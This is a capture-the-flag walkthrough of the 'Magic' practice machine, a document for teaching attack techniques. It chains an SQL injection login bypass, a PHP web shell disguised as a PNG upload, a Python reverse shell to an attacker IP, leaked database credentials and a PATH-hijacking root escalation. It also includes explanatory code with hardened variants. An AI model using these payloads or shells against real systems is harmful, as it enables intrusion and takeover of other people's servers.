[Meachines] [Medium] Magic: SQLi + file upload + skipping ahead with TRP00F privilege escalation + PATH hijacking privilege escalation

Information gathering

IP Address      Open Ports
10.10.10.185    TCP: 22, 80

$ nmap -p- 10.10.10.185 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLi & file upload

$ gobuster dir -u 'http://10.10.10.185/' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html

The upload trick used below relies on how Apache's mod_mime treats multi-extension file names: every extension is evaluated, not only the last one, so on a server that registers PHP per extension (AddHandler), a file named x.php.png is still handed to the PHP interpreter even though it ends in .png. The upload filter accepts the file because the name ends in .png and the body starts with a PNG signature.

http://10.10.10.185/login.php

The login form is injectable; the classic payload in the username field bypasses authentication:

username:admin' or '1'='1
password:xxxx
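To make the bypass concrete, here is an added example (not code from the page or from the Magic box) that reproduces the pattern behind it in Python against an in-memory SQLite table. The table contents, the concatenated query shape and the function names are assumptions. It also shows a detail the payload hides: in the username field it only works when that user exists (AND binds tighter than OR), while the same input does nothing against a parameterised query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Magic 'login' table (sample data, not dumped from the box)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO login (username, password) VALUES ('admin', 'Th3s3usW4sK1ng')")
    return db


def build_query(username: str, password: str) -> str:
    # Hypothetical reconstruction of the concatenation pattern behind login.php:
    # user input is spliced straight into the SQL text.
    return (f"SELECT username FROM login WHERE username = '{username}' "
            f"AND password = '{password}'")


def vulnerable_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """True when at least one row matches the concatenated query."""
    return db.execute(build_query(username, password)).fetchone() is not None


def safe_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised form: the quotes in the payload are bound as data, not parsed as SQL."""
    row = db.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("admin' or '1'='1", "xxxx"),   # page's payload: username='admin' OR ('1'='1' AND password='xxxx')
        ("nobody' or '1'='1", "xxxx"),  # same payload, unknown user: the OR branch needs the password
        ("nobody", "x' or '1'='1"),     # payload in the password field: ... AND password='x' OR '1'='1'
        ("admin", "Th3s3usW4sK1ng"),    # legitimate login
    ]
    for user, pw in cases:
        print(build_query(user, pw))
        print(f"  vulnerable={vulnerable_login(db, user, pw)}  safe={safe_login(db, user, pw)}")
```

The second case is the precedence trap: `'1'='1'` is ANDed with the password check, so the injected OR only helps when the left-hand username matches a real row. Putting the injection in the password field (third case) makes the trailing `OR '1'='1'` unconditional.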

Uploading the web shell: the file name carries a double extension (.php.png) and the body starts with the PNG signature (rendered as ‰PNG below) so that the image check passes, followed by the PHP payload.

POST /upload.php HTTP/1.1
Host: 10.10.10.185
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSRyaClLcBoHRDRp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.185/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ld7t5k74b1gjfaaevqcu33hcu5
Connection: close

------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="image"; filename="Screenshot_2024-08-08_08_28_47.php.png"
Content-Type: image/png

‰PNG


<?php system($_GET['cmd']); phpinfo(); ?>
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="submit"

Upload Image
------WebKitFormBoundaryRSRyaClLcBoHRDRp--
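As an added example (not from the page and not the box's upload.php), the Python below models what the request above depends on: the PNG signature followed by PHP, the two-part multipart body, a weak filter that checks only the final extension and the signature, Apache mod_mime's per-extension handler lookup under an assumed AddHandler registration, and a hardened variant that accepts only a single-extension name and stores the file under a server-chosen name. The filter logic, the handler map and all function names are assumptions.

```python
import re
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"          # 8-byte PNG signature (shown as "‰PNG" in the raw request)
IMAGE_EXTS = {"png", "jpg", "jpeg"}


def build_polyglot(php: bytes) -> bytes:
    """Upload body: PNG signature first, PHP after it. The signature satisfies an
    image-signature check; the PHP engine ignores the leading bytes and runs <?php ... ?>."""
    return PNG_MAGIC + b"\n" + php


def build_multipart(boundary: str, filename: str, body: bytes) -> bytes:
    """Multipart form body with the same two parts as the captured request."""
    b = boundary.encode()
    return (b"--" + b + b"\r\n"
            b'Content-Disposition: form-data; name="image"; filename="' + filename.encode() + b'"\r\n'
            b"Content-Type: image/png\r\n\r\n" + body + b"\r\n"
            b"--" + b + b"\r\n"
            b'Content-Disposition: form-data; name="submit"\r\n\r\nUpload Image\r\n'
            b"--" + b + b"--\r\n")


def weak_upload_check(filename: str, body: bytes) -> bool:
    """Assumed server-side filter: last extension whitelisted plus a PNG signature.
    shell.php.png passes both tests."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in IMAGE_EXTS and body.startswith(PNG_MAGIC)


# Assumed registration: AddHandler application/x-httpd-php .php
# mod_mime inspects every extension of a multi-extension name; the handler taken
# from ".php" still applies when ".png" is the final extension.
ADD_HANDLER = {"php": "application/x-httpd-php"}


def apache_handler(filename: str):
    """Handler mod_mime would assign: the rightmost extension with a handler mapping wins."""
    handler = None
    for ext in filename.split(".")[1:]:
        handler = ADD_HANDLER.get(ext.lower(), handler)
    return handler


def safe_store_name(filename: str, body: bytes):
    """Hardened variant: whole name must be <basename>.png (exactly one extension),
    signature required, and the stored name is chosen by the server, not the client."""
    if not body.startswith(PNG_MAGIC):
        return None
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.png", filename):
        return None
    return secrets.token_hex(8) + ".png"


if __name__ == "__main__":
    body = build_polyglot(b"<?php system($_GET['cmd']); ?>")
    name = "shell.php.png"
    print(build_multipart("----WebKitFormBoundaryRSRyaClLcBoHRDRp", name, body).decode("latin-1"))
    print("weak filter accepts:", weak_upload_check(name, body))
    print("handler for", name, "->", apache_handler(name))
    print("hardened stores", name, "as", safe_store_name(name, body))
    print("hardened stores shell.png as", safe_store_name("shell.png", body))
```

Whether a real server behaves like `apache_handler` depends on how PHP is registered: a per-extension AddHandler does; Ubuntu's stock PHP module config instead uses an end-anchored `<FilesMatch ".+\.ph(ar|p|tml)$">` with SetHandler, under which shell.php.png would be served as an image. Renaming uploads server-side removes the client's control over the extension chain regardless of the Apache configuration.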

The uploaded file can be located through the image URLs the home page serves (the images/uploads/ directory). Requesting it with a cmd parameter executes the command; here it is a URL-encoded Python reverse shell back to 10.10.16.24:10034:

curl 'http://10.10.10.185/images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'

Skipping ahead & TRP00F

Conveniently, TRP00F can be used to skip the intended chain and go straight from www-data to root:

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999


www-data to theseus

$ cat /var/www/Magic/db.php5

The database configuration file exposes the MySQL credentials:

username:theseus
password:iamkingtheseus

Forward port 3306 through chisel so the database is reachable from the attacking host, then log in with those credentials:

$ mysql -h 127.0.0.1 -utheseus -p

MySQL [Magic]> select * from Magic.login;

The login table holds the portal admin's password, which also works for theseus's system account (password reuse):

password:Th3s3usW4sK1ng

$ su theseus


User.txt

0f8c7dc6b4de6fc370a9d193350ce15c

Privilege escalation

$ find / -perm -4000 -type f 2>/dev/null

Among the SUID binaries, /bin/sysinfo stands out: a setuid-root binary that is not part of a stock Ubuntu install.

$ strings /bin/sysinfo

The strings show that it shells out to external tools such as cat by bare name rather than by absolute path, so each lookup goes through whatever PATH the caller provides.

PATH hijacking

Place a fake cat that launches a shell ahead of the real one in PATH, then run sysinfo; the setuid binary executes the fake cat with its elevated privileges:

theseus@magic:~$ echo '/bin/bash'>/tmp/cat;chmod +x /tmp/cat
theseus@magic:~$ export PATH=/tmp:$PATH
theseus@magic:~$ sysinfo
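As an added example that is not from the page, the Python below reproduces the mechanism without needing a setuid binary: it plants a fake cat in a temporary directory, shows what a bare cat resolves to under the hijacked PATH, runs a popen-style command the way the vulnerable binary does, and contrasts that with a call that uses an absolute path and a fixed PATH. The fake cat only echoes a marker instead of spawning a shell; the directory layout and function names are assumptions.

```python
import os
import shutil
import subprocess
import tempfile

# Stand-in for the page's /tmp/cat; it prints a marker rather than starting /bin/bash.
FAKE_CAT = "#!/bin/sh\necho HIJACKED\n"


def plant_fake_cat(dirpath: str) -> str:
    """Drop an executable named cat into the attacker-controlled directory."""
    path = os.path.join(dirpath, "cat")
    with open(path, "w") as f:
        f.write(FAKE_CAT)
    os.chmod(path, 0o755)
    return path


def resolve(command: str, path_env: str):
    """Which file a bare command name resolves to under a given PATH (same walk the shell does)."""
    return shutil.which(command, path=path_env)


def run_like_sysinfo(path_env: str) -> str:
    """Vulnerable pattern: popen("cat ...") inheriting the caller's PATH.
    /bin/sh resolves the bare name 'cat' through that PATH, so the planted file wins."""
    proc = subprocess.run("cat /dev/null", shell=True,
                          env={"PATH": path_env}, capture_output=True, text=True)
    return proc.stdout


def run_hardened(path_env: str) -> str:
    """Fix: absolute path to the tool and a PATH the program sets itself.
    The caller's PATH (path_env) is deliberately discarded."""
    proc = subprocess.run(["/bin/cat", "/dev/null"],
                          env={"PATH": "/usr/bin:/bin"}, capture_output=True, text=True)
    return proc.stdout


def demo() -> dict:
    """Run both variants against a freshly planted fake cat and report the outcomes."""
    tmp = tempfile.mkdtemp()
    fake = plant_fake_cat(tmp)
    hijacked = f"{tmp}:/usr/bin:/bin"
    return {
        "fake": fake,
        "resolved_hijacked": resolve("cat", hijacked),
        "resolved_clean": resolve("cat", "/usr/bin:/bin"),
        "vulnerable_output": run_like_sysinfo(hijacked).strip(),
        "hardened_output": run_hardened(hijacked),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

On the box the same resolution happens inside the setuid process, so the planted file runs as root; the fix is the one `run_hardened` shows, since a setuid program must not trust any part of the environment it inherits.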

Root.txt

9f8904b0558514cb9b60c6c6985dddbd
